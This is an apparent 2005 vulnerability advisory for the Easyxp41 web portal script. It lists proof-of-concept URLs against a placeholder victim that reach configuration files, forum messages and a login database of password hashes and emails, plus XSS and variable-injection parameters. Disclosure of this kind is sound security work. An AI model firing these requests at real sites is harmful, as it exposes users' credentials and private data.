XSS flaws and data disclosure in Easyxp41 ################################################ XSS flaws and data dliclosure in Easyxp41 vendor url: http://www.easypx41.be/ advisory: http://falcondeoro.blogspot.com/2005/07/ xss-flaws-and-data-disclosure-in.html vendor notify: Yes exploit available: Yes ################################################## Easyxp41 es a free script to make web portal.Yo can run it very easy.Easyxp41 , contains very flaw that open direct files and you can seethe contain to it. ########### verions ########### CMS full CMS test ############### Solution ############### No solution at this time !! ################### Timeline ################### Discovered: 26-07-2005 Vendor notify:29-07-2005 Disclosure:29-07-2005 ############ proof of concepts ############ ################################################ information disclosure in /forum/ folder: ######################################### http://[victim]/modules/forum/cfg/ http://[victim]/modules/forum/db/ http://[victim]/modules/forum/msg/ http://[victim]/modules/forum/admin/index.php http://[victim]/modules/forum/msg/1103495330.dat ############# information disclosure in /login/ folder: ############# http://[victim]/modules/login/ http://[victim]/modules/login/login.php http://[victim]/modules/login/admin/option.php http://[victim]/modules/login/cfg/modules.cfg http://[victim]/cfg/config.cfg http://[victim]/mesdocuments/ http://[victim]/modules/news/ ############# Cross-site scripting & variable injections. ############# http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection] http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500 http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection] http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500 http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS] http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection] http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection] Bad definition to variable forum = , with the flaw to up :modules/forum/msg we can read the messages without be identify in PHP: http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull ################## Name to file .dat to contain messages forum disclosure http://[victim]/modules/forum/db/rep.db ########################## User and password hash disclosure http://[victim]modules/login/db/login.db ########################## user email disclosuremodules/login/db/login.db ############################# €nd ########################## Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/ -- Atentamente: FalconDeOro (falcondeoro.blogspot.com) Web-Blog: http://falcondeoro.blogspot.com